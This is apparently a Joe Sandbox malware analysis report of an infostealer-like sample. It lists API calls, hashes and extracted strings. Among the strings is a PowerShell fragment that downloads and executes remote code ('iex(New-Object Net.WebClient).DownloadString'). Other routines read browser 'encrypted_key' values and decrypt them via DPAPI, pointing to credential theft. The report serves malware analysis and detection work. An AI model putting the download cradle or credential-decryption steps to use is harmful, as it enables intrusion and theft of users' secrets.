                                      • LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                      • CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                      • Instruction ID: 84ac4d8f3e20539679f6f6ec31d97be843f1fc6d4657c170a6f31836e0277ccb
                                      • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                      • Instruction Fuzzy Hash: B731F4B8A40209EFDB24CF94C895BAE77F5FF49705F108158E915AB2D0C778AA41CFA1
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C9EA
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __amsg_exit.LIBCMT ref: 0041CA0A
                                      • __lock.LIBCMT ref: 0041CA1A
                                      • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                      • free.MSVCRT ref: 0041CA4A
                                      • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                      • Instruction ID: 63787520114d18ae3399c837c16bfac6c494309a1b2e91ce42418771fe72ad0a
                                      • Opcode Fuzzy Hash: 9cc761a24a700c336990656e08babd42fdc3626541d12aa0f7b86557c35da351
                                      • Instruction Fuzzy Hash: DD01C431A817299BC722EB669C857DE77A0BF04794F11811BE814A7390C73C69D2CBDD
                                      APIs
                                      • __getptd.LIBCMT ref: 0231CC51
                                        • Part of subcall function 0231C206: __getptd_noexit.LIBCMT ref: 0231C209
                                        • Part of subcall function 0231C206: __amsg_exit.LIBCMT ref: 0231C216
                                      • __amsg_exit.LIBCMT ref: 0231CC71
                                      • __lock.LIBCMT ref: 0231CC81
                                      • InterlockedDecrement.KERNEL32(?), ref: 0231CC9E
                                      • free.MSVCRT ref: 0231CCB1
                                      • InterlockedIncrement.KERNEL32(0042B980), ref: 0231CCC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                      • Instruction ID: 1f85943197c0b051f6a3aafb624ccd548f9341119587772803849289e6ad69cb
                                      • Opcode Fuzzy Hash: 9842265763d25ebdd135a5071e54c4fa9195cc385294f2eefb115a4ad94e6967
                                      • Instruction Fuzzy Hash: 82012231A81B25ABCB3CAB64944475CB761FF00754F040517DC10A72A0CB346C83DFDA
                                      APIs
                                      • strlen.MSVCRT ref: 00416F1F
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                      • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                        • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                      APIs
                                      • strlen.MSVCRT ref: 02317186
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02317401,00000000,00420BA8,00000000,00000000), ref: 023171B4
                                        • Part of subcall function 02316E37: strlen.MSVCRT ref: 02316E48
                                        • Part of subcall function 02316E37: strlen.MSVCRT ref: 02316E6C
                                      • VirtualQueryEx.KERNEL32(02317574,00000000,?,0000001C), ref: 023171F9
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02317401), ref: 0231731A
                                        • Part of subcall function 02317047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 0231705F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: 971d6dd3b4e891c500aef27bb550c13383940c6bb412e2b715852f9a42312f1e
                                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction Fuzzy Hash: BC51E5B1E04109EBDB08CF99D981AEFB7B6BF88300F148519F915A7240D734EA12CBA5
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: *n@$*n@
                                      • API String ID: 1029625771-193229609
                                      • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                      • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                      • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                      • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                      APIs
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 02314A42
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 02314A68
                                      • lstrcat.KERNEL32(?,?), ref: 02314A87
                                      • lstrcat.KERNEL32(?,?), ref: 02314A9B
                                      • lstrcat.KERNEL32(?,0064A284), ref: 02314AAE
                                      • lstrcat.KERNEL32(?,?), ref: 02314AC2
                                      • lstrcat.KERNEL32(?,0064A2C8), ref: 02314AD6
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 02318FF7: GetFileAttributesA.KERNEL32(00000000,?,02301DBB,?,?,00425654,?,?,00420E1F), ref: 02319006
                                        • Part of subcall function 023147D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 023147E7
                                        • Part of subcall function 023147D7: RtlAllocateHeap.NTDLL(00000000), ref: 023147EE
                                        • Part of subcall function 023147D7: wsprintfA.USER32 ref: 0231480D
                                        • Part of subcall function 023147D7: FindFirstFileA.KERNEL32(?,?), ref: 02314824
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                      • Instruction ID: bece118181bc06011b48724e5ee7cab725ca69344f5f4a77cb2abcb02e5b88ec
                                      • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                      • Instruction Fuzzy Hash: 673153B69402186BDB28FBF0DC84EED737AAB58700F4045C9B64596080EEB49789CF99
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                      Strings
                                      • ')", xrefs: 00412CB3
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                      • <, xrefs: 00412D39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                      • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                      • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                      • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023014A5
                                      • __aulldiv.LIBCMT ref: 023014BF
                                      • __aulldiv.LIBCMT ref: 023014CD
                                      • ExitProcess.KERNEL32 ref: 023014FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: ce0d26527546c46b4a6c63f6e9c4e9ef6bbbb26aed3d6a2e99e44550847b7832
                                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction Fuzzy Hash: A0016DB0A40308FAEF20DBD0CC99B9DBBB9AB00705F208448E7097B2C0D7B495418B69
                                      APIs
                                      • memcmp.MSVCRT(?,00421264,00000003), ref: 0230A094
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02310CC7: memset.MSVCRT ref: 02310E83
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00000000), ref: 02310E9C
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00420D7C), ref: 02310EAE
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00000000), ref: 02310EC4
                                        • Part of subcall function 02310CC7: lstrcat.KERNEL32(?,00420D80), ref: 02310ED6
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • memcmp.MSVCRT(?,00421114,00000003), ref: 0230A116
                                      • memset.MSVCRT ref: 0230A14F
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 0230A1A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @
                                      • API String ID: 1977917189-2766056989
                                      • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction ID: 3a8265ea6789dd2155673e83019bdfbb2bae93e4f350a80e22ca301d60357a35
                                      • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction Fuzzy Hash: B1615E31600248EFCB28EFA4DDA5FED7776AF44705F408118EA0AAB5D0DB746A45CF51
                                      APIs
                                      • strtok_s.MSVCRT ref: 00410DB8
                                      • strtok_s.MSVCRT ref: 00410EFD
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,008786A0,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                      • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                      • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                      • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                        • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                        • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                        • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 3731072634-738592651
                                      • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                      • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                      • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                      • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CodeInfoPageValidmemset
                                      • String ID:
                                      • API String ID: 703783727-0
                                      • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction ID: a3435fac16ce18e9fdb67cc590e267ab347053f1ffde49ab94ecc47a095eee1e
                                      • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction Fuzzy Hash: FA31D631A842919EDB2E8F75CC94379BFA49B06315B18A9ABD881CF592C728C405C763
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 02316BD3
                                      • sscanf.NTDLL ref: 02316C00
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02316C19
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 02316C27
                                      • ExitProcess.KERNEL32 ref: 02316C41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction ID: 1da1f3f28ce8f835462f6823edd255195a3c79fea5b165424beae7c0d14f674a
                                      • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction Fuzzy Hash: 3521C9B5D14209AFCF08EFE4D9459EEB7BAFF48301F04852EE516A3250EB345605CB65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                      • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                      • RegOpenKeyExA.ADVAPI32(80000002,0087D760,00000000,00020119,?), ref: 00417E5E
                                      • RegQueryValueExA.ADVAPI32(?,00880F40,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                      • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231809E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023180A5
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 023180C5
                                      • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 023180E6
                                      • RegCloseKey.ADVAPI32(?), ref: 023180F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: c4a054ecec97f15f61296aa59ceea80e6af1a1a21dcaf4f0688523bc2ab24566
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: 90116DB6A84209BBE704CFD4DC4AFABB7BDEB05700F004219F615A7280C77558008BA1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0231799B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023179A2
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,02317920), ref: 023179C2
                                      • RegQueryValueExA.ADVAPI32(02317920,00420AAC,00000000,00000000,?,000000FF), ref: 023179E1
                                      • RegCloseKey.ADVAPI32(02317920), ref: 023179EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: d571568d269fc5199a069b53386e85dca67095528a54bcc5d989f2ab420d083b
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: 2B01FFB9A80308BFEB10DFE4DC4AFAEB7B9EB48701F105559FA05A7280DB7596008F51
                                      APIs
                                      • StrStrA.SHLWAPI(00880860,?,?,?,0041140C,?,00880860,00000000), ref: 0041926C
                                      • lstrcpyn.KERNEL32(0064AB88,00880860,00880860,?,0041140C,?,00880860), ref: 00419290
